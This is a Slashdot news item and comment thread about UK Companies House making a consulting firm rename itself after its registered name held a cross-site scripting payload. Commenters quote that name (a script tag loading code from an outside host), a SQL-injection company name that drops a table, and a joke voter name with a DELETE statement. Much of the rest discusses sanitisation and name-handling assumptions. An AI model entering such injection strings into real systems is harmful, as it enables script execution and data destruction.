UK Agency Demands Company Stop Using Name Which Includes an HTML Closing Tag

A British software engineer came up with "a fun playful name" for his consulting business. He'd named it:

"">

Unfortunately, this did not amuse the official registrar of companies in the United Kingdom (known as Companies House). The Guardian reports that the U.K. agency "has forced the company to change its name after it belatedly realised it could pose a security risk." Henceforward, the software engineer's consulting business will instead be legally known as "THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD." He now says he didn't realise that Companies House was actually vulnerable to the extremely simple technique he used, known as "cross-site scripting", which allows an attacker to run code from one website on another.
Engadget adds: Companies House, meanwhile, said it had "put measures in place" to prevent a repeat. You won't be trying this yourself, at least not in the U.K.

It's more than a little amusing to see a for-the-laughs code name stir up trouble, but this also illustrates just how fragile web security can be.

This has never been more obligatory

[r2kordmaa]

https://xkcd.com/327/ [xkcd.com]

Re:

[Anonymous Coward]

Hence it being linked from the OP.

Re: This has never been more obligatory

[jovius]

Careful now. You are breaking slashdot with that attitude of following links to the sources and reading past the subject line.

Re: This has never been more obligatory

[DontBeAMoran]

You're reading the subject lines?

GET HIM!

Re:

[AC-x]

Actually read the summary? Are you crazy? X^)

Re:This has never been more obligatory

[thegreatbob]

Regarding database access... if your language supports it, use parameterized queries... please.

Re:This has never been more obligatory

[mccalli]

And if your language doesn't support it, dump it and get a proper language instead.

Re:

[account_deleted]

Comment removed based on user account deletion

So how do I do a parameterized IN ()?!

[aberglas]

SELECT * FROM T WHERE X IN ('A', 'B', 'C')

In ANY language?

You build up a query as strings.

Re:

[account_deleted]

Comment removed based on user account deletion

Re:This has never been more obligatory

[Sique]

For each of you who just think that "using the proper tool" is already a valid solution, please rethink [kalzumeus.com]!

Re:

[Entrope]

Anyone who says "people have names" is a wrong assumption can be safely dismissed as a crank.

Re:

[Sique]

People don't necessarily have names, not in the sense we would use it. The "name" of Imperator Augustus was Octavianus, which just meant: The Eighth, as he was the eighth child of his parents. In general, Romans didn't have names, they just acquired titles and nicknames during their life.

Re:This has never been more obligatory

[Entrope]

He was born Gaius Octavius. (He apparently got his cognomen of "Thurinus" somewhat after his birth.) He changed his name to include Octavianus, after his birth family, after Gaius Julius Caesar died and Caesar's will named Gaius his adopted son and heir. At each point, he had a name that was recognized as such, distinct from titles and nicknames.

If you're going to try to be pedantic, get at least the core details right.

Re:

[Sique]

Actually, Romans had some name, but it didn't really matter. And it gets even more complicated. There were 18 praenomens in use, as far as we know, but most of them went out of use, and only the three Caius, Lucius and Marcus remained, at least for males. As they didn't really help to distinguish people, they went mostly out of daily use, or were left abbreviated in inscriptions. If people were aristocracy, they also had the name of their gens. Thus Caius Iulius (Caesar) was of the gens of the Iulians. But

Re:

[Entrope]

I was rebutting the claim about "people have names" being a false assumption, so it matters very much if Romans had names. I have a name, Donald John Trump has a name, Yoshihide Suga (more formally è... 義å) has a name. "People have names" is an empirically provable fact, not a false assumption.

And Octavius was Augustus Caesar's nomen at birth because he was a member of gens Octavia. It had absolutely nothing to do with his birth order.

Trying to translate Roman names the way you

Re:

[Entrope]

Thanks for mangling Prime Minister Suga's name, Slashdot!

Re:

[Sique]

Emperor Julian Apostata belongs to a different time period. He was not living in Rome (I don't find any source right now that he ever was in Rome even for a visit), but in Constantinople and talking Greek instead of Latin. His name is of Latin origin (as he was the Emperor of the Roman Empire), but that's about as Latin as it gets for him. Differently than for Romans living two or three centuries earlier than him, the actual meaning of the names was not as important as the inheritance of the names from his

Re:

[Entrope]

You are still not helping your original claim, that Romans didn't have names in the same way we do. They certainly used them differently, but he wasn't named Nero because of his strength or Ahenobarbus because of his beard. You'll find the same kind of name changes in many of the ruling families before the late 20th century -- for example, Prince Phillip abandoned his birth titles and changed his family name to Mountbatten. It doesn't mean he was born in, or conquered, Battenberg.

Re:

[RockDoctor]

"People have names" is an empirically provable fact, not a false assumption.

Everybody that you can name probably does have a "name" in the sense that you use it.

But you are not the only person in the world, and the language which you speak is not the only language in the world. Whether you would recognise all the different forms of names in use as being "names" in your familiar sense is a different question.

Probably, within a peer group, individuals have some shorthand for identifying one other as distin

Re:

[arglebargle_xiv]

Anyone who's ever owned an Italian car knows that this practice of repeatedly duct-taping things up rather than coming up with a proper once-and-for-all fix is still alive and active today.

Re:

[Mordaximus]

Not all cultures assign names before/immediately after birth.

Re:

[Entrope]

The crank spent no fewer than five other items in his list on that point. I'm going to charitably assume he was not repeating himself further.

Re:

[Send it to the newts]

Personal Name [wikipedia.org]

Still other cultures lack the concept of specific, fixed names designating people, either individually or collectively. Certain isolated tribes, such as the Machiguenga of the Amazon, do not use personal names.*

* The Machiguenga may have nicknames, but generally refer to each other by how they are related. They may disambiguate with biographical information, such as "sister, the one who slipped in the river".

Re:

[arglebargle_xiv]

Certain isolated tribes, such as the Machiguenga of the Amazon, do not use personal names

I bet they have endless difficulties signing up to iTunes.

Re:

[Send it to the newts]

And those cultures should be ignored.

That's more than a little ironic coming from an AC.

Re: This has never been more obligatory

[e3m4n]

>> It was because of my father that from the ages of seven to fifteen, I thought that my name was Jesus Christ and my brother, Russell, thought that his name was Dammit. "Dammit, will you stop all that noise?" And, "Jesus Christ, sit down!" One day, I'm out playing in the rain, and my father yelled, "Dammit will you get back in here!" I said, "Dad, I'm Jesus Christ!"

Too soon? Lol

Re:

[thereddaikon]

The ones with computer databases do.

Re: This has never been more obligatory

[St.Creed]

I take it you don't model data for international banks.

Or you work in the USA - the software coming out of the USA is amazingly stupid in its assumptions that every country looks exactly like the USA (just look at the central contact data in SalesForce for an example of US- centric design).

Re: This has never been more obligatory

[CastrTroy]

I don't think it's anything specifically about americans but really just a problem with naive people making wrong assumptions and then it's difficult to change things later. Lets say you design a system and assume everyone has first_name and last_name, because everybody you have ever met has a first_name and last_name. Then you design a system with this assumption. You get hundreds or thousands (or more) of clients working on your system, happily entering data, and the somebody comes in and asks you to change it so that it's just one big name field. What are your options? Do you force all your existing customers to change the way they do things? Or do you just leave it and tell the new customer to try to work with things the way they are? I think that maybe some other cultures are less susceptible to this because they may be exposed to more languages and customs early on, but I wouldn't say that this is a solely American problem.

Re:

[Xarun]

Anyone who says "people have names" is a wrong assumption can be safely dismissed as a crank.

A newborn baby needs to be entered into a hospital information system, obviously they are assigned a name at birth, right? There are further examples of why you shouldn't require people to have names, for instance a police information system should take into account the possibility that the person entered into it is unable or unwilling to give a name (note: entering "John Doe" is a *very* poor workaround). I work with Personal Identifiable Information from all over the world and not only do I agree with th

Re:

[Entrope]

I am not sure what hospitals near you do, but the ones around here usually put "Baby Boy ", or something similar, for newborns.

It's one thing to note that there are edge cases, like the kind of people who aren't going to use a computer system, or when they are newborn. But the overwhelming majority of people have names -- most of them include spaces, even -- and prefer to be addressed by name rather than by some arbitrarily assigned number. "I am not a number, I am a person!"

Re:

[Xarun]

I am not sure what hospitals near you do, but the ones around here usually put "Baby Boy ", or something similar, for newborns.

And yet "Baby Boy something-or-other" is not usually considered a name (neither de facto nor de jure), it is a placeholder. That is one of the things missing from the list, "names are always names".

the overwhelming majority of people have names -- most of them include spaces, even

And that is exactly the point of the list, while any of those assumptions are true for some subset of people, you shouldn't assume they hold for all people (not to mention the fact that a space in a name can mean several things, e.g. a name field separator (between, say, first name and last name), a name part sep

Re:

[anegg]

My personal recommendation is that in information systems you avoid dealing with names where possible, always use IDs except for informational purposes, such as display names.

I believe that this is the conclusion that Microsoft came to (eventually), leading to the widespread use of Security Identifiers instead of names. See https://en.wikipedia.org/wiki/Security_Identifier [wikipedia.org]. It makes imminent sense. If nothing else, some people change names when they get married. Others do it for a variety of other reasons. Separating the messiness of human naming from the technical aspects of identity seems to be a good thing to do for a lot of reasons. Different cultural naming convention

Re:

[RockDoctor]

If nothing else, some people change names when they get married.

Do people change their names if their parents get married where you live? Or, if children are responsible for looking after their parents in their old age, do the parents have to change their names when their children get married?

Re:

[RockDoctor]

I am not sure what hospitals near you do, but the ones around here usually put "Baby Boy ", or something similar, for newborns.

So, they have 4 or 5 classifications - anatomical male, anatomical female, anatomically indeterminate (which would normally be about 1% of births), parental non-specified (a significant number of parents want the child themselves to find out what their gender is - say, another percent or so) and "other" (which would probably need to be free-form).

Your assumptions about what is "rig

Re:

[anegg]

A newborn baby needs to be entered into a hospital information system, obviously they are assigned a name at birth, right?

When my son was born, my wife and I were having a hard time finalizing his name. The hospital was not very happy that we had not bound a name to our offspring, and were even less happy at the prospect that we would leave their demesne without doing so, and implied that it was illegal for us to do so. After verifying that it was not, in fact, illegal, I contemplated doing it to demonstrate I could. However... we settled on a name before we left, and I chose not to be a d*ck to the hospital.

While doing ge

Re:

[Anonymous Coward]

It depends on the application. Are you designing a payroll system, an e-mail system, or another system designed for adults who are part of society? Then yes of course you can assume people have names. Are you designing a system that accounts for people with unknown names (e.g. a hospital admission system or a police report system)? Then you need to account for that.

Are you accounting for newborns? Then they don't have names either and you need to account for people who are related to known people but don't

SQL feature request

[Tablizer]

Also, SQL should allow data to be placed after the query. If you start with a query block, and end with a data block, and require that order, then there is no way the data block contents can change interpretation of the query block. Have a named place-holder option and a sequential match option to match the data to the query.

Granted, some degree of "data injection" may still be possible if games are played with quotes, but it at least eliminates query injection.

Re:

[arglebargle_xiv]

Once saw a talk by someone who actually had some sort of official ID card with something similar to Bobby Tables on it. He said he was security-testing their systems...

Re:This has never been more obligatory

[tinkerton]

Seems like Bobby Tables grew up and went into business!

Re:

[AntronArgaiv]

Managing Director: Mr. Robert Tables

Re:

[awwshit]

Robert D. Tables

Re:

[lkcl]

https://xkcd.com/327/ [xkcd.com] :)

Balance of efforts

[HetMes]

If a simple rejection of particular sequences of characters for a business name reduces security risks for possibly millions of people, then I'm all for that. Or we just could force all those thousands of unemployed software engineers everyone is always talking about into slavery to shore up security in the local library's database and web interface, free of charge.

Re:

[Anonymous Coward]

Please don't. They're probably unemployed because they caused those same mistakes at their previous employer. It baffles me that so-called Computer Science courses don't have any content on security or even make mention of OWASP and get students to investigate it on their own.

Re:Balance of efforts

[HiThere]

That's a pretty big "if". Try this one:
If a company name written in ASCII-7 will break a database, the database software needs to be rewritten.
I'm not even asking for unicode, not even the European plane.

Please tell me..

[MullerMn]

Please tell me the fact that this tag doesn't render on Slashdot is deliberate and not a sign of how fucking slapdash the editing here is...

Re:

[AleRunner]

You mean the tag

"">

? Seems to render fine to me. What's your problem with it?

Re:Please tell me..

[Anonymous Coward]

If you RT*second*FA, the company was actually named:
"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD,

T*first*FA renders it as "">, so it's unclear whether it's a ./ error or just someone copying the problem from the article.

Re:Please tell me..

[EMN13]

Although it's some next level irony that one of the articles itself appears to have been vulnerable to script injection somewhere in their publishing pipeline, because it's very implausible they just so happened to purposefully remove the script-tag entirely from the company name without even an explanation.

Re:

[Megane]

When a message is posted on Slashdot, all unrecognized tags are stripped. This is why you should always read your preview before clicking the Submit button. If you want to talk about tags, you need to use &lt; and &gt; (and yes, I had to escape those &s as &amp;).

But since /. "editors" don't, this is what we get.

Re:

[EMN13]

No no, this isn't (just) slashdots fault; one of the actual articles omits the script tag too!

Re:

[sconeu]

Looks like Little Bobby Table's mom [xkcd.com] got a new job.

Re:

[hcs_$reboot]

Next level:

""&gt;

Re:

[DontBeAMoran]

Next next level:
""&amp;gt;

Re:

[Zocalo]

Actually, it's the same in TFA, so either ""> actually was the company name or the Guardian rendered it incorrectly (they've used "&gt" in the source though) and Slashdot blindly copied it.

Anyway, the new company name is now the following smiley :/>, so we're all good, right? :)

Re:Please tell me..

[jeremyp]

If you read the Engadget link, you'll see that it is not the correct name. The correct name included a script tag to HTTPS://MJT.XSS.HT

Output encoding

[walter-t]

It's not fragile. This was a non-problem over 25-years ago when almost everyone coded CGI scripts in Perl using CGI.pm, and it has not changed with new techniques. People just need an hour security education before starting to write web applications.

Re:

[Entrope]

You might like to think so, but I worked with an application developer by people who knew, and at least mostly, cared about security but the database stored company names like "Smith &amp; Wesson" for dumb Perl front-end reasons. They didn't want to spend the effort to do it right, so they kept doing it wrong.

Re:

[SharpFang]

In the database, that can handle arbitrary strings, and may be required to interact with several dozen different subsystems most of which won't have a clue about urlencode escape codes ?

Re:

[Tablizer]

I have to agree. The database shouldn't have to assume output is HTML or any other specific format. Data tends to outlive UI technology. (and I hope a better standard supplants HTML/DOM/CSS. They suck for CRUD apps.)

Re:

[WaffleMonster]

Storing the character "&" as "&" is the proper way to do it. It's called special characters escaping.

Absolutely not. This advice is both dangerous and nonsensical.

Re:

[Bengie]

Even general security experts tend to do the regurgitating rain dance. In one way you'll find that developers following best practice will use a password framework which handles all of the hashing and salting, but then they'll log the raw passwords. If nothing else positive to say about fools, they're creative. Someone will build the Titanic, watch it sink and say "We'll make the next one absolutely impossible to sink" and then they'll build the Hindenburg. There's an unlimited number of ways to fail and fe

The usual suspect...

[johnw]

Adrian Kennard - https://www.revk.uk/ [www.revk.uk] - was that you?

This is how you steal an election

[muffen]

https://www.wired.co.uk/articl... [wired.co.uk]

Sigh.

[ledow]

Director: Little Bobby Tables.

Re:

[kyrsjo]

Director: Little Bobby Tables.

Not so little anymore!

Pathetic

[AlexHilbertRyan]

Good too see those running the country didnt have half a brain to make rules about valid characters for a company name and couldnt manage to have their systems written to be safe to begin with.

Re:

[nagora]

Good too see those running the country didnt have half a brain to make rules about valid characters for a company name and couldnt manage to have their systems written to be safe to begin with.

This is the tip of the iceburg for Companies House. They're probably still using foolscap paper for their filing. Their "database" is full of inaccurate or simply fraudulent information and no one has any time or inclination to do anything about it.

Re: Pathetic

[St.Creed]

Yup. Companies House is one of the more unreliable business directories in the EU. And that's saying something.

Re: Pathetic

[gnasher719]

Yup. Companies House is one of the more unreliable business directories in the EU. And that's saying something.

Excuse me, but they are not a business directory. They are the ones who decide if you have a business or not. The ones that send you fines if you don't update your information regularly.

Re: Pathetic

[VaccinesCauseAdults]

This.

If you are seeing what you think is a company in some other business directory, but itâ(TM)s not in Companies House, then news flash: itâ(TM)s not actually a company.

Re:

[redback]

their system wasn't affected, but they recognised that other systems can pull that data, and they may be affected. And also generally just recognise that Company names are serious business and you shouldn't have names this silly.

Re:

[BAReFO0t]

And they SHOULD be affected!

Seriously. if you are so stupid that you run in front of every car you see, you do not get to blame the driver! You get to win a Darwin Award!

Re:

[thereddaikon]

Not in the UK. It's the land of health and safety regulations.

Re:Companies house *very* insecure then.

[HiThere]

No, that's a valid reason. I'll need to think about about how it *should* be handled, but it's a reasonable justifier for prohibiting the given name.

Consider, please, whether you think this problem should be addressed by managers or lawyers, because it's going to be decided by one or the other.

Re:

[BAReFO0t]

Looked into it. Easy to hack as fuck. Nothing of any value found inside. Don't have a digital turd fetish.

"a for-the-laughs code name"

[poptopdrop]

They meant "company", not "code".

Read what you quote FFS, you lazy buggers.

That was not the original name

[demon driver]

The Register [theregister.com] properly stated the original name on Friday. As Slashdot's forum HTML seems to have no option to make it visible here, either, just like the Guardian, from which they copied it, I can only link to the Register...

Re:That was not the original name

[Whibla]

The Register [theregister.com] properly stated the original name on Friday. As Slashdot's forum HTML seems to have no option to make it visible here, either, just like the Guardian, from which they copied it, I can only link to the Register...

Your post is, in essence, analogous to the nature of the problem faced by the programmers who 'create' these problems in the first place. Assuming this was your intention, well played sir!

In order to link to the Register you created an anchor tag (<a>) with the Register's address within it. In other words you've demonstrated the minimal level of understanding required to exploit the main function of the world wide web, the ability to create a 'jump point' to another site. Of course any site that accepts HTML cannot directly display the greater than (>, which you have to write as &gt;) or less than (<, which you have to write as &lt;) symbols because the HTML 'interpreter' thinks you're trying to enter some code as opposed to simple text. Similarly displaying the ampersands in the previous sentence requires the writer to know the code sequence that specifies you want to write it as text rather than have the block it's part of be interpreted as code.

In other words, there's the level of knowledge essential to make something work, then there's a level of knowledge required to do something more complicated, not to mention the understanding as to why the more complicated stuff is necessary. Hence, on so many occasions, sanitising inputs falls through the cracks.

So, there is a way of displaying the full company name ("><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD) you just need to jump through a few hoops in order to not trigger the 'what follows is some code' function of the interpreter.

Re:

[demon driver]

Thanks for elaborating! I thought it must be possible somehow and I tried some stuff but indeed I forgot to try HTML entities... Another thing that didn't occur to me at the time was the <xmp> tag, which I guess would have been the most obvious way for a 'real' HTML document; it doesn't seem to work here in the editor, though.

Re:That was not the original name

[BAReFO0t]

Yes, we do. It's visible in a comment above! All you need to do, is escape the greater than / lower than. >< ... See? I wrote that by writing &gt;&lt; And I wrote THAT, by writing &amp;gt;&amp;lt;.

Re:

[coofercat]

I'm sure there was another of these a few years back - if memory serves, it was a SQL injection attack, rather than XSS, so apparently Companies House have at least plugged one gap.

It will some day be valid

[misnohmer]

Long time ago (early 90's) I attempted to register "com.com" domain name but the registrar (don't remember which one, I was in Canada at the time) refused with a reason given something along the lines of "it is not a valid domain name because it would confuse routing". Later someone did register it and it is a valid domain name today. Had the registrar not refused me back then, I probably could have retired by selling the domain during dot com boom. I was a little bitter about this for a while (late 90's), but oh well....

Good job there isn't an SQL Injection Limited

[LilBlackKittie]

Oh wait, there is!

https://find-and-update.compan... [service.gov.uk]

aka

; DROP TABLE "COMPANIES";-- LTD

Re:

[Waccoon]

I just want to know what kind of client would buy from a company with that name.

I had to test it:

[Parker Lewis]

""> Something to bypass the minimum size.

Companies House Rules

[gnasher719]

Companies House is the government agency that has the power to allow you to have a company name or refuse you the right. They absolutely have the right to refuse a name that could cause problems.

The stupid assumption that Companies House themselves have a vulnerability is a non sequitur. But they are responsible for business names not creating _any_ kind of trouble, usually by using misleading business names, and can reject this name.

Did not read the TFA

[DarkOx]

You guys realize its possible the Company office has not problems handling the characters but still does not want them used because they share data with others. Others who might make dumb decisions like "I can trust the data because its coming from a state agency."

This is the reality of inter-operating with other's systems for those of you have not figured it out yet. Even if your system does everything right, you still get black eye and get blamed as often as not. Maybe your web service returns a nice JSON blob with everything correctly escaped for JSON, maybe you explicitly stated in the documentation, that content is not neutralized for HTML. Guess what when some bank blindly sets the CompanyName string you send to the .innerHTML property of some DOM object they will still call you and complain if something bad happens.

I wish to formally apologies to Republicans

[thegarbz]

It started out as a joke. Me and some comrades were drinking wodka and thought, why don't we steal an election. So I filled out a few absentee ballot request forms. When we registered we signed our names as "Garbz'); DELETE FROM Voters WHERE Registered LIKE '%Republican%'"

It was just fun and games. And then I saw the absentee ballots get counted.

I'm sorry comrades.